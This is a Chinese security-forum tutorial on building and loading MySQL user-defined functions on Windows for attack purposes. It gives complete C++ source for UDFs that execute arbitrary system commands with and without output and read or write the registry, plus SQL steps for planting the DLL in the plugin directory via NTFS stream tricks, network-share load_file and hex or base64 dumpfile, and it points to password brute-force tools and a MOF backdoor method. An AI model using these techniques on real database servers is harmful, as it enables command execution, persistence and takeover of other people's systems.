1、MySQL UDF是什么

UDF是Mysql提供给用户实现自己功能的一个接口,为了使UDF机制起作用,函数必须用C或C ++编写,并且操作系统必须支持动态加载。这篇文章主要介绍UDF开发和利用的方法。

2、UDF开发

操作系统:Windows 10

测试环境:PHPStudy+Mysql 5.5(x64)

编译器:VS2015

2.1 编译器方法

  • MySQL源码包

从MySQL官网下载对应版本的源码包,把MySQL对应版本的源码下载回来。将include文件夹和lib文件夹解压至C++项目路径。

http://mirror.yandex.ru/mirrors/ftp.mysql.com/Downloads/MySQL-5.5/mysql-5.5.59-winx64.zip

  • VS2015配置-项目属性

    将MySQL的include、lib文件夹放到C++项目路径后。属性配置如下:

    • include:VC++目录->包含目录->添加include目录
    • lib:VC++目录->库目录->添加lib目录
    • libmysql.lib:链接器->附加依赖项->添加libmysql.lib

2.2 调试方法

UDF在程序代码中加入调试OutputDebugStringA();就可以输出调试的信息了。在每个分支都输出相对应的调试信息,就可以获取当前运行的状态。

OutputDebugStringA("--UDF:my_name()被调用");

2.3 使用UDF扩展

// 注册函数
CREATE FUNCTION about RETURNS string SONAME "mysql_udf_c++.dll";
// 卸载函数
Drop function about;
// 使用函数
select about();
// 验证
select * from mysql.func where name = 'cmdshell';

2.4 CPP源码思路

  • 执行CMDSHELL
    使用方式:
# 创建cmdshell函数
CREATE FUNCTION cmdshell RETURNS int SONAME "mysql_udf_c++.dll";
# 执行shell函数,如果不加路径默认路径在mysql的data目录下。例如:"D:\phpStudy\MySQL\data\helllo.txt"
select cmdshell("echo hello>>helllo.txt");
# 注销cmshell这个函数
Drop function cmdshell;

CPP源码如下:

#include <winsock.h>
#include <mysql.h>  
#ifndef UNICODE
#define UNICODE
#endif
#pragma comment(lib, "netapi32.lib")

#include <stdio.h>
#include <windows.h> 
#include <lm.h>


//--------cmdshell
extern "C" __declspec(dllexport)my_bool cmdshell_init(UDF_INIT *initid, 
    UDF_ARGS *args, 
    char *message)
{   //参数长度 
    unsigned int i = 0;
    if (args->arg_count == 1
        && args->arg_type[i] == STRING_RESULT) {
        // 返回正常
        return 0;
    }
    else {
        strcpy(
            message
            , "Expected exactly one string type parameter"
            );
        //执行失败  
        return 1;
    }
}
extern "C" __declspec(dllexport)my_ulonglong cmdshell(UDF_INIT *initid,
    UDF_ARGS *args, 
    char *result, 
    char *error)
{
    // 利用sysytem函数执行命令
    // 执行“net user >> hello.txt”命令,实际路径为D:\phpStudy\MySQL\data\hello.txt
    // 执行数字例如:select cmdshell("1");就会导致MySQL结束服务。
    return system(args->args[0]);

}
extern "C" __declspec(dllexport)void cmdshell_deinit(
    UDF_INIT *initid)
{

    if (initid->ptr)
    {
        free(initid->ptr);
    }
}
  • 回显shell

回显shell编写尝试,跟没有回显的shell执行命令是一样的原理。
核心原理是创建一个管道,把命令结果输入管道读取出来后关闭管道。

使用方式:

# 创建sys_eval函数
CREATE FUNCTION sys_eval RETURNS string SONAME "mysql_udf_c++.dll";
# 执行shell函数,如果不加路径默认路径在mysql的data目录下。例如:"D:\phpStudy\MySQL\data\helllo.txt"
select sys_eval("echo hello>>helllo.txt");
# 注销cmshell这个函数
Drop function sys_eval;

CPP源码如下:

#include <winsock.h>
#include <mysql.h>  


#ifndef UNICODE
#define UNICODE
#endif
#pragma comment(lib, "netapi32.lib")

#include <stdio.h>
#include <windows.h> 
#include <lm.h>


//--------
extern "C" __declspec(dllexport)my_bool sys_eval_init(UDF_INIT *initid, 
    UDF_ARGS *args, 
    char *message)
{   //参数长度
    unsigned int i = 0;
    if (args->arg_count == 1
        && args->arg_type[i] == STRING_RESULT) {
        return 0;
    }
    else {
        strcpy(
            message
            , "Expected exactly one string type parameter"
            );
        return 1;
    }
}
extern "C" __declspec(dllexport)char*  sys_eval(UDF_INIT *initid
    , UDF_ARGS *args
    , char* result
    , unsigned long* length
    , char *is_null
    , char *error)
{
    FILE *pipe;
    char buff[1024];
    unsigned long outlen, linelen;

    // 开辟内存
    result = (char*)malloc(sizeof(char));
    outlen = 0;
    // 创建管道
    pipe = _popen(args->args[0], "r");
    // 读取管道数据
    while (fgets(buff, sizeof(buff), pipe) != NULL) {
        linelen = strlen(buff);
        result = (char*)realloc(result, outlen + linelen);
        // 把管道内容拷贝进返回结果里
        strncpy(result + outlen, buff, linelen);
        outlen = outlen + linelen;
    }
    // 关闭管道
    _pclose(pipe);

    // 当*is_null被设置为1时,返回值为NULL
    if (!(*result) || result == NULL) {
        *is_null = 1;
    }
    else {
        result[outlen] = 0x00;
        *length = strlen(result);
    }
    // 返回结果
    return result;

}
extern "C" __declspec(dllexport)void sys_eval_deinit(
    UDF_INIT *initid)
{

    if (initid->ptr)
    {
        free(initid->ptr);
    }
}
  • 注册表操作

核心代码主要是以下几个注册表操作相关的API实现的

RegQueryInfoKey
RegEnumValue
RegQueryValueEx
RegCloseKey
RegCreateKeyEx
RegSetValueEx
RegCloseKey
    • 注册表读取

使用方式:

# 创建regread函数
CREATE FUNCTION regread RETURNS string SONAME "mysql_udf_c++.dll";
# 执行regread函数
select regread("HKEY_CURRENT_USER","Software\\Microsoft\\Internet Explorer\\Main","Start Page");
# 注销regread这个函数
Drop function regread;

CPP源码如下:

#include <winsock.h>
#include <mysql.h>  

#include <stdio.h>
#include <windows.h> 


#define MAX_KEY_LENGTH 255
#define MAX_VALUE_NAME 16383

//--------
extern "C" __declspec(dllexport)my_bool regread_init(UDF_INIT *initid,
    UDF_ARGS *args,
    char *message)
{  

    //判断参数是否正确,三个参数必须是字符串
    if (args->arg_type[0] == STRING_RESULT &&  // 主键
        args->arg_type[1] == STRING_RESULT &&  // 键项
        args->arg_type[2] == STRING_RESULT     // 键值
        )
    {
        return 0;
    }
    else {
        strcpy(
            message
            , "Expected exactly Three string type parameter"
            );
        return 1;
    }
}
extern "C" __declspec(dllexport)char*  regread(UDF_INIT *initid
    , UDF_ARGS *args
    , char* result
    , unsigned long* length
    , char *is_null
    , char *error)
{
    HKEY hRoot;
    // 判断根键
    if (strcmp("HKEY_LOCAL_MACHINE", (char*)(args->args)[0]) == 0)
        hRoot = HKEY_LOCAL_MACHINE;
    else if (strcmp("HKEY_CLASSES_ROOT", (char*)(args->args)[0]) == 0)
        hRoot = HKEY_CLASSES_ROOT;
    else if (strcmp("HKEY_CURRENT_USER", (char*)(args->args)[0]) == 0)
        hRoot = HKEY_CURRENT_USER;
    else if (strcmp("HKEY_USERS", (char*)(args->args)[0]) == 0)
        hRoot = HKEY_USERS;
    else
    {
        initid->ptr = (char *)malloc(50 + strlen((args->args)[0]));
        sprintf(initid->ptr, "unknow:%s\r\n", (args->args)[0]);
        *length = strlen(initid->ptr);
        return initid->ptr;
    }


    // 判断根键存不存在
    // 编码转换 char转wchar
    int len = MultiByteToWideChar(CP_ACP, 0, (args->args)[1], strlen((args->args)[1]), NULL, 0);
    wchar_t*    m_wchar = new wchar_t[len + 1];
    MultiByteToWideChar(CP_ACP, 0, (args->args)[1], strlen((args->args)[1]), m_wchar, len);
    m_wchar[len] = '\0';
    HKEY aTestKey = NULL;
    DWORD dwType = REG_SZ;
    if (RegOpenKeyEx(hRoot,
        m_wchar,
        0,
        KEY_READ,
        &aTestKey) != ERROR_SUCCESS
        )
    {
        initid->ptr = (char *)malloc(50 + strlen((args->args)[1]));
        sprintf(initid->ptr, "unknow:%s\r\n", (args->args)[1]);
        *length = strlen(initid->ptr);
        return initid->ptr;
    }   



    // 查询键项目
    TCHAR    achClass[MAX_PATH] = TEXT("");  // 指定一个字串,用于装载这个注册表项的类名 
    DWORD    cchClassName = MAX_PATH;        // 指定一个变量,用于装载lpClass缓冲区的长度。一旦返回,它会设为实际装载到缓冲区的字节数量 
    DWORD    cSubKeys = 0;                   // 子键的数目 
    DWORD    cbMaxSubKey;                    // 设置最大子键长度 
    DWORD    cchMaxClass;                    // 指定一个变量,用于装载这个项之子项的最长一个类名的长度 
    DWORD    cValues;                        // 用于装载这个项的设置值数量的一个变量
    DWORD    cchMaxValue;                    // value的最长名字
    DWORD    cbMaxValueData;                 // value的最长数据
    DWORD    cbSecurityDescriptor;           // 安全描述符的大小 
    FILETIME ftLastWriteTime;                // 上次写入的时间 

    DWORD i, retCode;
    DWORD dwSize;
    TCHAR *wStr = new TCHAR[MAX_VALUE_NAME];
    TCHAR  achValue[MAX_VALUE_NAME];
    TCHAR  data[MAX_VALUE_NAME];
    DWORD cchValue = MAX_VALUE_NAME;
    DWORD dBufSize;   //返回结果长度

    // Get the class name and the value count. 
    retCode = RegQueryInfoKey(
        aTestKey,                // 主键句柄 
        achClass,                // 指定一个字串,用于装载这个注册表项的类名
        &cchClassName,           // 指定一个变量,用于装载lpClass缓冲区的长度。一旦返回,它会设为实际装载到缓冲区的字节数量
        NULL,                    // reserved 
        &cSubKeys,               // 用于装载(保存)这个项的子项数量的一个变量
        &cbMaxSubKey,            // 指定一个变量,用于装载这个项最长一个子项的长度。注意这个长度不包括空中止字符
        &cchMaxClass,            // 指定一个变量,用于装载这个项之子项的最长一个类名的长度
        &cValues,                // 用于装载这个项的设置值数量的一个变量
        &cchMaxValue,            // 指定一个变量,用于装载这个项之子项的最长一个值名的长度
        &cbMaxValueData,         // 指定一个变量,用于装载容下这个项最长一个值数据所需的缓冲区长度
        &cbSecurityDescriptor,   // 装载值安全描述符长度的一个变量 
        &ftLastWriteTime);       // 指定一个结构,用于容纳该项的上一次修改时间 

    // 枚举键值. 
    // 匹配出对应的值
    if (cValues)
    {
        for (i = 0, retCode = ERROR_SUCCESS; i < cValues; i++)
        {
            cchValue = MAX_VALUE_NAME;
            dwSize = MAX_VALUE_NAME;
            achValue[0] = '\0';
            data[0] = '\0';
            retCode = RegEnumValue(aTestKey, i,
                wStr,
                &cchValue,
                NULL,
                NULL,
                NULL,
                NULL);
            RegQueryValueEx(aTestKey, wStr,
                NULL,
                &dwType,
                (LPBYTE)data,
                &dwSize);


            // 编码转换 char转wchar
            int len = MultiByteToWideChar(CP_ACP, 0, (char*)(args->args)[2], strlen((char*)(args->args)[2]), NULL, 0);
            wchar_t*    m_wchar = new wchar_t[len + 1];
            MultiByteToWideChar(CP_ACP, 0, (char*)(args->args)[2], strlen((char*)(args->args)[2]), m_wchar, len);
            m_wchar[len] = '\0';


            if (retCode == ERROR_SUCCESS && wcscmp(wStr, m_wchar) == 0)
            {
                //printf("\n键名:%ls\n键值:%ls", wStr, data);

                //获取转换所需的目标缓存大小
                dBufSize = WideCharToMultiByte(CP_OEMCP, 0, data, -1, NULL, 0, NULL, FALSE);

                //分配目标缓存
                result = new char[dBufSize];
                memset(result, 0, dBufSize);
                //转换
                int nRet = WideCharToMultiByte(CP_OEMCP, 0, data, -1, result, dBufSize, NULL, FALSE);

            }
        }
    }
    delete[]wStr;
    RegCloseKey(aTestKey);



    // 当*is_null被设置为1时,返回值为NULL
    if (!(*result) || result == NULL) {
        *is_null = 1;
    }
    else {
        result[dBufSize] = 0x00;
        *length = strlen(result);
    }
    // 返回结果
    return result;
}
extern "C" __declspec(dllexport)void regread_deinit(
    UDF_INIT *initid)
{

    if (initid->ptr)
    {
        free(initid->ptr);
    }
}
    • 注册表写入
      使用方式:
# 创建regread函数
CREATE FUNCTION regwrite RETURNS string SONAME "mysql_udf_c++.dll";
# 执行regread函数
select regwrite("HKEY_CURRENT_USER","Software\\Microsoft\\Internet Explorer\\Main","test","www.baidu.com");
# 注销regread这个函数
Drop function regwrite;

CPP源码如下:

#include <winsock.h>
#include <mysql.h>  

#include <stdio.h>
#include <windows.h> 

//--------
extern "C" __declspec(dllexport)my_bool regwrite_init(UDF_INIT *initid,
    UDF_ARGS *args,
    char *message)
{  

    //判断参数是否正确,三个参数必须是字符串
    if (args->arg_type[0] == STRING_RESULT &&  // 主键
        args->arg_type[1] == STRING_RESULT &&  // 键项
        args->arg_type[2] == STRING_RESULT &&  // 键
        args->arg_type[3] == STRING_RESULT     // 写入的值
        )
    {
        return 0;
    }
    else {
        strcpy(
            message
            , "Expected exactly four string type parameter"
            );
        return 1;
    }
}
extern "C" __declspec(dllexport)char*  regwrite(UDF_INIT *initid
    , UDF_ARGS *args
    , char* result
    , unsigned long* length
    , char *is_null
    , char *error)
{



    HKEY hRoot;
    // 判断根键
    if (strcmp("HKEY_LOCAL_MACHINE", (char*)(args->args)[0]) == 0)
        hRoot = HKEY_LOCAL_MACHINE;
    else if (strcmp("HKEY_CLASSES_ROOT", (char*)(args->args)[0]) == 0)
        hRoot = HKEY_CLASSES_ROOT;
    else if (strcmp("HKEY_CURRENT_USER", (char*)(args->args)[0]) == 0)
        hRoot = HKEY_CURRENT_USER;
    else if (strcmp("HKEY_USERS", (char*)(args->args)[0]) == 0)
        hRoot = HKEY_USERS;
    else
    {
        initid->ptr = (char *)malloc(50 + strlen((args->args)[0]));
        sprintf(initid->ptr, "unknow:%s\r\n", (args->args)[0]);
        *length = (unsigned long)strlen(initid->ptr);
        return initid->ptr;
    }

    HKEY hKey;
    DWORD dwType = REG_SZ;
    // 打开注册表键,不存在则创建它

    // 判断根键存不存在
    // szSubKey编码转换 char转wchar
    int szSubKey_len = (int)MultiByteToWideChar(CP_ACP, 0, (args->args)[1], strlen((args->args)[1]), NULL, 0);
    wchar_t*    szSubKey = new wchar_t[szSubKey_len + 1];
    MultiByteToWideChar(CP_ACP, 0, (args->args)[1], strlen((args->args)[1]), szSubKey, szSubKey_len);
    szSubKey[szSubKey_len] = '\0';

    size_t lRet = RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
    if (lRet != ERROR_SUCCESS)
    {
        initid->ptr = (char *)malloc(50 + strlen((args->args)[1]));
        sprintf(initid->ptr, "unknow:%s\r\n", (args->args)[1]);
        *length = (unsigned long)strlen(initid->ptr);
        return initid->ptr;
    }

    // 修改注册表键值,没有则创建它
    // ValueName修改的键项转换 char转wchar
    int ValueName_len = MultiByteToWideChar(CP_ACP, 0, (args->args)[2], strlen((args->args)[2]), NULL, 0);
    wchar_t*   ValueName = new wchar_t[ValueName_len + 1];
    MultiByteToWideChar(CP_ACP, 0, (args->args)[2], strlen((args->args)[2]), ValueName, ValueName_len);
    ValueName[ValueName_len] = '\0';

    //// 注册表键值编码转换 char转wchar
    int data_len = MultiByteToWideChar(CP_ACP, 0, (args->args)[3], strlen((args->args)[3]), NULL, 0);
    wchar_t*  data = new wchar_t[data_len + 1];
    MultiByteToWideChar(CP_ACP, 0, (args->args)[3], strlen((args->args)[3]), data, data_len);
    data[data_len] = '\0';
    // 计算宽字节的长度
    DWORD iLen = (DWORD)wcslen(data);

    //注册表键值修改
    lRet = RegSetValueEx(hKey, ValueName, 0, dwType, (unsigned char*)data, sizeof(wchar_t)*data_len);
    if (lRet != ERROR_SUCCESS)
    {
        initid->ptr = (char *)malloc(50 + strlen((args->args)[2]));
        sprintf(initid->ptr, "unknow:%s\r\n", (args->args)[2]);
        *length = (unsigned long)strlen(initid->ptr);
        return initid->ptr;
    }
    RegCloseKey(hKey);


    // 当*is_null被设置为1时,返回值为NULL
    if (!(*result) || result == NULL) {
        *is_null = 1;

    }
    else {
        sprintf(result, "success");
        result[iLen] = 0x00;
        *length = strlen(result);
    }
    // 返回结果
    return result;
}
extern "C" __declspec(dllexport)void regwrite_deinit(
    UDF_INIT *initid)
{

    if (initid->ptr)
    {
        free(initid->ptr);
    }
}

3、UDF加载方法

UDF有两种加载方式,一种是修改修改MySQL配置文件。第二种则是将UDF放置在MySQL指定的插件目录中加载。

3.1 修改MySQL配置文件

另一种方法是用插件目录编写一个新的MySQL配置文件并将其传递给mysqld。

  • 启动参数配置

    // 通过mysqld更改plugin的目录位置
    mysqld.exe –plugin-dir=C:\\temp\\plugins\\
    // 编写一个新的mysql配置文件,并通过–defaults-file参数将其传递给mysqld
    mysqld.exe --defaults-file=C:\temp\my.ini
  • my.ini配置

    [mysqld]
    plugin_dir = C:\\temp\\plugins\\

3.2 新建插件目录

show variables like 'plugin_dir';   # 查看路径

select 'xxx' into dumpfile 'D:\phpStudy\MySQL\lib::$INDEX_ALLOCATION';          # 新建目录lib

select 'xxx' into dumpfile 'D:\phpStudy\MySQL\lib\plugin::$INDEX_ALLOCATION';  # 新建目录plugin

3.3 导出UDF文件置扩展目录

  • load_file函数

    • load_file函数支持网络路径,如果将DLL复制到网络共享中,则可以直接加载它并写入磁盘。
select load_file('\\\\192.168.0.19\\share\\udf.dll') into dumpfile "D:\\phpStudy\\MySQL\\lib\\plugin\\udf.dll";
  • 用一个十六进制编码的字符串将整个DLL文件写入磁盘。
// 转换为hex函数
select hex(load_file('D:\\udf.dll')) into dumpfile "D:\\udf.hex";
// 导入
select 0x4d5a...... into dumpfile "D:\\phpStudy\\MySQL\\lib\\plugin\\udf.dll";
  • 创建一个表并将二进制数据插入到十六进制编码流中,其中的二进制数据用update语句来连接。
create table temp(data longblob); 
insert into temp(data) values (0x4d5a9....); 
update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b377a382b35ba383b369f10ab376a383b369f116b375a383b369f111b376a383b369f112b376a383b35269636877a383b300000000000000000000000000000000504500006486060070b1834b00000000); select data from temp into dump file "D:\\phpStudy\\MySQL\\lib\\plugin\\udf.dll";
  • 直接在磁盘上将文件从网络共享加载到第三种方法创建的表中,使用“load data infile”语句在本地加载。像上图所示将文件转换为十六进制,并在写入磁盘时取消编辑。
load data infile '\\\\192.168.0.19\\share\\udf.hex' into table temp fields terminated by '@OsandaMalith' lines terminated by '@OsandaMalith' (data); 
select unhex(data) from temp into dumpfile 'D:\\phpStudy\\MySQL\\lib\\plugin\\udf.dll';
  • 使用MySQL 5.6.1和MariaDB 10.0.5中介绍的函数“to_base64”和“from_base64”上传二进制文件。
# 转换为base64
select to_base64(load_file('D:\\udf.dll'));

# base64导出为DLL
select from_base64("Base64编码") into dumpfile "D:\\phpStudy\\MySQL\\lib\\plugin\\udf.dll";

4、Mysql弱口令

4.1 暴力破解程序

  • 工具:hydra

  • CPP

用链表实现的MYSQL、MSSQL和oracle密码暴破C程序

http://blog.51cto.com/foxhack/35604

  • Python

https://github.com/chinasun021/pwd_crack/blob/master/mysql/mysql_crack.py

https://www.waitalone.cn/python-mysql-mult.html

  • Go

https://github.com/netxfly/x-crack

4.2 MySQL口令加密解密

5、WEB组合利用

5.1 后门方法

导出Mof

5.2 WEB渗透测试扩展

php探针、PHPMyadmin

6、取证分析

// 查看系统信息
select @@version_compile_os,@@version_compile_machine,@@plugin_dir;

// 查看加载的函数
select * from mysql.func;

7、参考

Mysql函数扩展之UDF开发

https://blog.csdn.net/albertsh/article/details/78567661

VS2015配置C/C++-MySQL开发环境

https://blog.csdn.net/daso_csdn/article/details/54646859

MySQL UDF(自定义函数)

https://www.cnblogs.com/raker/p/4377343.html

MySQL UDF的调试方式 - debugview
https://blog.csdn.net/swotcoder/article/details/18527

详详详解MySQL UDF执行命令

http://www.360doc.cn/article/31784658_733287732.html

利用MySQL UDF进行的一次渗透测试
https://m.sohu.com/a/224950139_354899/?pvid=000115_3w_a

24.4.2.2 UDF Calling Sequences for Aggregate Functions

https://dev.mysql.com/doc/refman/5.5/en/udf-aggr-calling.html

windows下编写mysql UDF函数的失败经历,与ubuntu下的成功编译经历

https://blog.csdn.net/watch_ch/article/details/54015948

开源项目

https://github.com/mysqludf/lib_mysqludf_sys

8、UDF写注册表源码

C++_Mysql开发_UDF写注册表.rar (0.268 MB) 下载附件
点击收藏 | 1 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖